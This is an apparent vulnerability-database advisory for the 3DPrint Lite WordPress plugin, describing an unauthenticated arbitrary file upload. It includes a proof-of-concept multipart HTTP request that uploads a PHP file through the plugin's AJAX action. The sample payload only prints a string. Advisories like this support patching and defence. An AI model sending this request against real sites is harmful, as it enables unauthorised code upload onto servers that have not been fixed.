logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

3DPrint Lite <= 1.9.1.4 - Unauthenticated Arbitrary File Upload

Description

The p3dlite_handle_upload AJAX action of the plugin does not have any authorisation and does not check the uploaded file, allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
Content-Length: 366
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="action"

p3dlite_handle_upload
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="file"; filename="a.php"
Content-Type: text/php

<?php echo 'Failed'; ?>
-----------------------------54331109111293931601238262353--

Affects Plugins

3dprint-lite

No known fix - plugin closed

References

ExploitDB

50321

Classification

Type

UPLOAD

CWE

CWE-434

Miscellaneous

Original Researcher

Spacehen

Verified

Yes

WPVDB ID

c46ecd0d-a132-4ad6-b936-8acde3a09282

Timeline

Publicly Published

2021-09-23 (about 4 months ago)

Added

2021-09-23 (about 4 months ago)

Last Updated

2021-09-23 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin